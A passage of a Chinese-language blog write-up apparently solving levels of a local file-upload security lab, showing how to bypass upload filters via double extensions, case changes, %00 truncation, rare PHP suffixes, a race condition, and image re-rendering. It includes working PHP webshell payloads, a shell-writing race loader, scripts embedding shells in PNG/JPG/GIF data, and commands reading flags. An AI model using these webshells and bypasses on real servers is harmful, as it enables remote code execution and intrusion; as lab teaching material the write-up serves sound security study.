<p>看到『 忽略大小写版本 』：无法通过大小写绕过</p>
<h2 id="Bypass-4"><a href="#Bypass-4" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包双写为 pphphp 后缀</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202103716.png" alt="image-20201202103716028"></p>
<p>成功上传</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202103802.png" alt="image-20201202103802562"></p>
<hr>
<h1 id="30006-大小写绕过"><a href="#30006-大小写绕过" class="headerlink" title="30006 - 大小写绕过"></a>30006 - 大小写绕过</h1><p>本关函数使用了 str_replace </p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202104247.png" alt="image-20201202104247797"></p>
<h2 id="本关特征-5"><a href="#本关特征-5" class="headerlink" title="本关特征"></a>本关特征</h2><p>同样的黑名单替换且 Windows 环境特性是不区分大小写</p>
<h2 id="Bypass-5"><a href="#Bypass-5" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包修改后缀 Php</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202104654.png" alt="image-20201202104653974"></p>
<p>成功上传</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202104630.png" alt="image-20201202104630562"></p>
<hr>
<h1 id="30007-GET-型-00-截断绕过"><a href="#30007-GET-型-00-截断绕过" class="headerlink" title="30007 - GET 型 %00 截断绕过"></a>30007 - GET 型 %00 截断绕过</h1><p><strong>%00 截断：</strong>PHP 内核是由 C 语言实现的，所以使用了 C 语言中的一些字符串处理函数。比如在连接字符串时候， 0 字节 (\x00) 将作为字符串结束符。所以在这个地方，攻击者只要在最后加入一个 0 字节，就能截断 file 变量之后的字符串。</p>
<p><strong>%00 截断适用条件</strong></p>
<ul>
<li>magic_quotes_gpc = Off</li>
<li>PHP 版本小于 5.3.4</li>
</ul>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202105647.png" alt="image-20201202105647786"></p>
<h2 id="本关特征-6"><a href="#本关特征-6" class="headerlink" title="本关特征"></a>本关特征</h2><ul>
<li><p>只允许上传 jpg jpeg png gif 类型的文件</p>
</li>
<li><p>观察上图 路径信息是以 GET 方式传递到服务端的 默认会进行一次 URL 编码 </p>
</li>
<li><p>而 %00 解码后就是空字节</p>
</li>
</ul>
<h2 id="Bypass-6"><a href="#Bypass-6" class="headerlink" title="Bypass"></a>Bypass</h2><p>上传 x.php 抓包修改后缀和 MIME 类型 同时在上传路径添加 new.php 并使用 %00 截断</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202111626.png" alt="image-20201202111626099"></p>
<p>成功绕过：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202111657.png" alt="image-20201202111657435"></p>
<p>原理是 <code>%00</code> 起到截断的作用，最终会在 upload 目录下面生成 new.php </p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202111905.png" alt="image-20201202111905283"></p>
<p>顺便读一下 flag：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202112004.png" alt="image-20201202112004049"></p>
<hr>
<h1 id="30008-POST-型-00-截断绕过"><a href="#30008-POST-型-00-截断绕过" class="headerlink" title="30008 - POST 型 %00 截断绕过"></a>30008 - POST 型 %00 截断绕过</h1><p>题目同上</p>
<h2 id="本关特征-7"><a href="#本关特征-7" class="headerlink" title="本关特征"></a>本关特征</h2><p> 抓包发现路径信息是以 POST 方式传递到服务端的</p>
<h2 id="Bypass-7"><a href="#Bypass-7" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包通过 %00 截断</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202154337.png" alt="image-20201202154337615"></p>
<p>因为不是 GET 型 所以需要手动 URL 解码</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202160756.png" alt="image-20201202160756857"></p>
<blockquote>
<p>这里解码后虽然看起来没有东西 但是如果不存在 %00 URL 解码后的空字节的话无法绕过成功上传</p>
</blockquote>
<p>上传成功：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202161038.png" alt="image-20201202161038805"></p>
<hr>
<h1 id="30009-黑名单绕过"><a href="#30009-黑名单绕过" class="headerlink" title="30009 - 黑名单绕过"></a>30009 - 黑名单绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202162201.png" alt="image-20201202162201276"></p>
<h2 id="本关特征-8"><a href="#本关特征-8" class="headerlink" title="本关特征"></a>本关特征</h2><p>黑名单限制了不可上传的文件类型</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202162120.png" alt="image-20201202162120435"></p>
<h2 id="Bypass-8"><a href="#Bypass-8" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包改后缀为 <code>phtml</code> 即可上传成功：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202162545.png" alt="image-20201202162545430"></p>
<blockquote>
<p>题目中提示的这些冷门后缀均可以绕过：phtml  pht  php3  php3p  php4  php5</p>
<p>或者 BP 改包：</p>
<p>p</p>
<p>hp</p>
<p>或者后缀加 00% 或者 %0a(换行) 或者空格</p>
<p>尝试能否在 ①.②p③h④p⑤  这五个位置进行 fuzz</p>
</blockquote>
<hr>
<h1 id="30010-条件竞争绕过"><a href="#30010-条件竞争绕过" class="headerlink" title="30010 - 条件竞争绕过"></a>30010 - 条件竞争绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202163653.png" alt="image-20201202163652956"></p>
<h2 id="本关特征-9"><a href="#本关特征-9" class="headerlink" title="本关特征"></a>本关特征</h2><p>还是同样的白名单服务端校验：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202164643.png" alt="image-20201202164643117"></p>
<ol>
<li>先通过 move_uploaded_file() 将文件上传至服务器中</li>
<li>上传完毕后通过 in_array($ext,$whitelist) 检查文件名后缀</li>
<li>如果后缀名合法，则对文件进行 rename 重命名，上传完成</li>
<li>如果后缀名非法，则 unlink 删除文件</li>
</ol>
<p>因此可以通过条件竞争的方式在unlink之前，访问 shell.php</p>
<h2 id="Bypass-9"><a href="#Bypass-9" class="headerlink" title="Bypass"></a>Bypass</h2><p>竞争马 <code>shell.php</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> fputs(fopen(<span class="string">&#x27;x.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php eval($_REQUEST[x])?&gt;&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>抓包发送到 Intruder 使用 Null 空值无限爆破：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202202424.png" alt="image-20201202202424416"></p>
<p>然后抓取访问 shell.php 的数据包：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/upload/shell.php</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:30010</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span>: none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span>: navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span>: ?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span>: document</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br></pre></td></tr></table></figure>

<p>也使用 Null 空值爆破：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202214004.png" alt="image-20201202214004036"></p>
<blockquote>
<p>这里空值爆破的时候一定要把 Positions 中的变量 clear 掉</p>
</blockquote>
<p>上传成功：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202214050.png" alt="image-20201202214049619"></p>
<p> 进容器中验证一下：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202214239.png" alt="image-20201202214239520"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查看当前容器</span></span><br><span class="line">docker ps -a</span><br><span class="line"><span class="comment"># 进入容器</span></span><br><span class="line">docker <span class="built_in">exec</span> -it a92 /bin/bash</span><br></pre></td></tr></table></figure>

<hr>
<h1 id="30011-二次渲染绕过"><a href="#30011-二次渲染绕过" class="headerlink" title="30011 - 二次渲染绕过"></a>30011 - 二次渲染绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201203094540.png" alt="image-20201203094540032"></p>
<h2 id="本关特征-10"><a href="#本关特征-10" class="headerlink" title="本关特征"></a>本关特征</h2><ul>
<li><p>服务端对上传的图片做了二次渲染</p>
</li>
<li><p>可以远程文件包含逃避渲染上传后的图片</p>
</li>
</ul>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204103634.png" alt="image-20201204103634619"></p>
<h2 id="Bypass-10"><a href="#Bypass-10" class="headerlink" title="Bypass"></a>Bypass</h2><p>分别使用 GIF、PNG、JPG 来尝试绕过：</p>
<h2 id="GIF"><a href="#GIF" class="headerlink" title="GIF"></a>GIF</h2><p>上传一张 cute.gif</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204123541.png" alt="image-20201204123541539"></p>
<p>下载渲染后的 /upload/1616623862.gif</p>
<p>使用 010Editor 打开渲染前后的两张 GIF，在没有发生变化的数据库部分插入 Webshell </p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204104650.png" alt="image-20201204104650657"></p>
<p>对比发现文件头后到箭头上方的内容是一样的：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204104925.png" alt="image-20201204104925737"></p>
<p>插入一句话 <code>&lt;?php eval($_REQUEST[1]);?&gt;</code></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204123346.png" alt="image-20201204123346127"></p>
<p>上传后下载渲染后的 GIF 查看payload 是否还在：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204125325.png" alt="image-20201204125325338"></p>
<p>利用文件包含上传的图马：<code>http://127.0.0.1:30011/?file=./upload/655485171.gif</code></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204125758.png" alt="image-20201204125757996"></p>
<p>读 Flag：<code>http://127.0.0.1:30011/?file=./upload/655485171.gif&amp;1=system(%27cat%20/f*%27);</code></p>
<blockquote>
<p>/表示根目录的文件或文件夹</p>
<p>./ 表示当前目录的文件或文件夹 「 等于不加 / 」</p>
<p>../表示父级目录的文件或文件夹</p>
</blockquote>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204130556.png" alt="image-20201204130556897"></p>
<h2 id="PNG"><a href="#PNG" class="headerlink" title="PNG"></a>PNG</h2><p>PNG 二次渲染后除了文件头，其他部分全部不一致</p>
<h3 id="写入-PLTE-数据块"><a href="#写入-PLTE-数据块" class="headerlink" title="写入 PLTE 数据块"></a>写入 PLTE 数据块</h3><blockquote>
<p><a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/drops/tips-16034.html" ref="nofollow">WooYun 乌云 - php imagecreatefrom* 系列函数之 png</a> </p>
<p>修改索引图像插入 PHP 代码的脚本项目地址为：<a target="_blank" rel="noopener" href="https://github.com/hxer/imagecreatefrom-/blob/master/png/poc/poc_png.py" ref="nofollow">Github - poc_png.py</a> </p>
</blockquote>
<p>因为只有索引图像才能将 payload 成功插入到 PLTE 数据块中</p>
<p>所以准备一张索引颜色的 <code>love.png</code>：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204134048.png" alt="image-20201204134048514"></p>
<p>使用上面的脚本生成 <code>love_shell.png</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">python png_shell.py -p <span class="string">&#x27;&lt;?php eval($_REQUEST[1]);?&gt;&#x27;</span> -o love_shell.png love.png</span><br><span class="line"></span><br><span class="line">hexdump -C love_shell.png | head -5</span><br><span class="line">00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|</span><br><span class="line">00000010  00 00 01 68 00 00 01 68  08 03 00 00 00 4d 3b 91  |...h...h.....M;.|</span><br><span class="line">00000020  e7 00 00 03 00 50 4c 54  45 3c 3f 70 68 70 20 65  |.....PLTE&lt;?php e|</span><br><span class="line">00000030  76 61 6c 28 24 5f 52 45  51 55 45 53 54 5b 31 5d  |val(<span class="variable">$_REQUEST</span>[1]|</span><br><span class="line">00000040  29 3b 3f 3e ff ff fe ff  ff fe ff ff ff ff ff ff  |);?&gt;............|</span><br></pre></td></tr></table></figure>

<p>上传进行二次渲染得到 <code>1914602453.png</code></p>
<p>使用脚本再次生成 <code>love_shell1.png</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">python png_shell.py -p <span class="string">&#x27;&lt;?php eval($_REQUEST[1]);?&gt;&#x27;</span> -o love_shell1.png 1914602453.png</span><br><span class="line"></span><br><span class="line">hexdump -C love_shell1.png | head -5</span><br><span class="line">00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|</span><br><span class="line">00000010  00 00 01 68 00 00 01 68  08 03 00 00 00 4d 3b 91  |...h...h.....M;.|</span><br><span class="line">00000020  e7 00 00 01 f5 50 4c 54  45 3c 3f 70 68 70 20 65  |.....PLTE&lt;?php e|</span><br><span class="line">00000030  76 61 6c 28 24 5f 52 45  51 55 45 53 54 5b 31 5d  |val(<span class="variable">$_REQUEST</span>[1]|</span><br><span class="line">00000040  29 3b 3f 3e <span class="built_in">fc</span> fb fb fd  <span class="built_in">fc</span> fd fa fa fa fb fa fa  |);?&gt;............|</span><br></pre></td></tr></table></figure>

<p>再次上传得到 <code>1997665874.png</code></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204140855.png" alt="image-20201204140855280"></p>
<p>读取 Flag：<code>http://127.0.0.1:30011/?file=upload/1997665874.png&amp;1=system(%27cat%20/f*%27);</code></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204141029.png" alt="image-20201204141029867"></p>
<p><strong>这里一共需要使用脚本制作两次：</strong></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204140928.png" alt="image-20201204140928170"></p>
<h3 id="写入IDAT数据块"><a href="#写入IDAT数据块" class="headerlink" title="写入IDAT数据块"></a>写入IDAT数据块</h3><p>新建一个 IDAT.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$p = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0x0e</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>,</span><br><span class="line">           <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>,</span><br><span class="line">           <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>,</span><br><span class="line">           <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>,</span><br><span class="line">           <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>,</span><br><span class="line">           <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>,</span><br><span class="line">           <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>,</span><br><span class="line">           <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"></span><br><span class="line">$img = imagecreatetruecolor(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ($y = <span class="number">0</span>; $y &lt; sizeof($p); $y += <span class="number">3</span>) &#123;</span><br><span class="line">   $r = $p[$y];</span><br><span class="line">   $g = $p[$y+<span class="number">1</span>];</span><br><span class="line">   $b = $p[$y+<span class="number">2</span>];</span><br><span class="line">   $color = imagecolorallocate($img, $r, $g, $b);</span><br><span class="line">   imagesetpixel($img, round($y / <span class="number">3</span>), <span class="number">0</span>, $color);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">imagepng($img,<span class="string">&#x27;./shell.png&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p> 命令行 <code>php IDAT.php</code> 生成 <code>shell.png</code> </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">hexdump -C shell.png</span><br><span class="line">00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|</span><br><span class="line">00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 <span class="built_in">fc</span> 18 ed  |... ... ........|</span><br><span class="line">00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|</span><br><span class="line">00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|</span><br><span class="line">00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  |c\&lt;?=<span class="variable">$_GET</span>[0](<span class="variable">$_</span>|</span><br><span class="line">00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?&gt;X....|</span><br><span class="line">00000060  73 5e 37 93 <span class="built_in">fc</span> 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.&#125;.<span class="string">&#x27;..|</span></span><br><span class="line"><span class="string">00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|</span></span><br><span class="line"><span class="string">00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|</span></span><br><span class="line"><span class="string">00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|</span></span><br><span class="line"><span class="string">000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|</span></span><br><span class="line"><span class="string">000000ae</span></span><br></pre></td></tr></table></figure>

<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204154340.png" alt="image-20201204154340390"></p>
<p>上传后下载二次渲染之后的 <code>1800595762.png</code> 检验一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">hexdump -C 1800595762.png</span><br><span class="line">00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|</span><br><span class="line">00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 <span class="built_in">fc</span> 18 ed  |... ... ........|</span><br><span class="line">00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|</span><br><span class="line">00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|</span><br><span class="line">00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  |c\&lt;?=<span class="variable">$_GET</span>[0](<span class="variable">$_</span>|</span><br><span class="line">00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?&gt;X....|</span><br><span class="line">00000060  73 5e 37 93 <span class="built_in">fc</span> 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.&#125;.<span class="string">&#x27;..|</span></span><br><span class="line"><span class="string">00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|</span></span><br><span class="line"><span class="string">00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|</span></span><br><span class="line"><span class="string">00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|</span></span><br><span class="line"><span class="string">000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|</span></span><br><span class="line"><span class="string">000000ae</span></span><br></pre></td></tr></table></figure>

<p>成功绕过：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204153742.png" alt="image-20201204153736218"></p>
<h2 id="JPG"><a href="#JPG" class="headerlink" title="JPG"></a>JPG</h2><p>JPG 也需要使用脚本将数据插入到特定的数据库，而且可能会不成功，所以需要多次尝试。</p>
<p><strong>项目地址</strong>：<a target="_blank" rel="noopener" href="https://github.com/BlackFan/jpg_payload" ref="nofollow">Github - lackFan/jpg_payload</a></p>
<ol>
<li><p>先上传 <code>sheep.jpg</code></p>
</li>
<li><p>下载渲染后的 <code>518422027.jpg</code></p>
</li>
<li><p>使用 <code>jpg_payload.php</code> 脚本插入 payload </p>
</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 修改脚本第一行的 payload：</span></span><br><span class="line">$miniPayload = <span class="string">&#x27;&lt;?php $_GET[0]($_POST[1]);?&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 命令行执行</span></span><br><span class="line">php jpg_payload.php <span class="number">518422027.</span>jpg</span><br><span class="line">Success!%</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>上传脚本处理后的 <code>payload_518422027.jpg</code></li>
</ol>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204164848.png" alt="image-20201204164848428"></p>
<ol start="5">
<li>二次渲染后得到 <code>596614187.jpg</code></li>
</ol>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204164736.png" alt="image-20201204164736907"></p>
<ol start="6">
<li>检查一下 payload 还在不在：</li>
</ol>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204165036.png" alt="image-20201204165036283"></p>
<ol start="7">
<li>成功执行 <code>ls /</code> 命令：</li>
</ol>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204163013.png" alt="image-20201204163013249"></p>
<blockquote>
<p>注意需要被服务端 imagecreatefromjpeg 渲染后再用脚本插入 payload</p>
</blockquote>
<hr>
<h1 id="30012-move-uploaded-file-绕过"><a href="#30012-move-uploaded-file-绕过" class="headerlink" title="30012 - move_uploaded_file 绕过"></a>30012 - move_uploaded_file 绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204165400.png" alt="image-20201204165400409"></p>
<h2 id="本关特征-11"><a href="#本关特征-11" class="headerlink" title="本关特征"></a>本关特征</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">move_uploaded_file($temp_file, $img_path)</span><br></pre></td></tr></table></figure>

<p>当 <code>$img_path</code> 可控的时候，还会忽略掉 <code>$img_path</code> 后面的 <code>/.</code>  可直接 Getshell</p>
<h2 id="Bypass-11"><a href="#Bypass-11" class="headerlink" title="Bypass"></a>Bypass</h2><p>保存文件名称为 <code>x.php/.</code></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204170251.png" alt="image-20201204170251449"></p>
<p>读一下 Flag：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204170326.png" alt="image-20201204170326145"></p>
<hr>
<h1 id="30013-代码审计绕过"><a href="#30013-代码审计绕过" class="headerlink" title="30013 - 代码审计绕过"></a>30013 - 代码审计绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201204171422.png" alt="image-20201204171421931"></p>
<h2 id="本关特征-12"><a href="#本关特征-12" class="headerlink" title="本关特征"></a>本关特征</h2><p>核心代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="literal">false</span>;</span><br><span class="line">$msg = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_FILES[<span class="string">&#x27;upload_file&#x27;</span>]))&#123;</span><br><span class="line">    <span class="comment">//检查MIME</span></span><br><span class="line">    $allow_type = <span class="keyword">array</span>(<span class="string">&#x27;image/jpeg&#x27;</span>,<span class="string">&#x27;image/png&#x27;</span>,<span class="string">&#x27;image/gif&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!in_array($_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>],$allow_type))&#123;</span><br><span class="line">        $msg = <span class="string">&quot;禁止上传该类型文件!&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="comment">//检查文件名</span></span><br><span class="line">        $file = <span class="keyword">empty</span>($_POST[<span class="string">&#x27;save_name&#x27;</span>]) ? $_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span 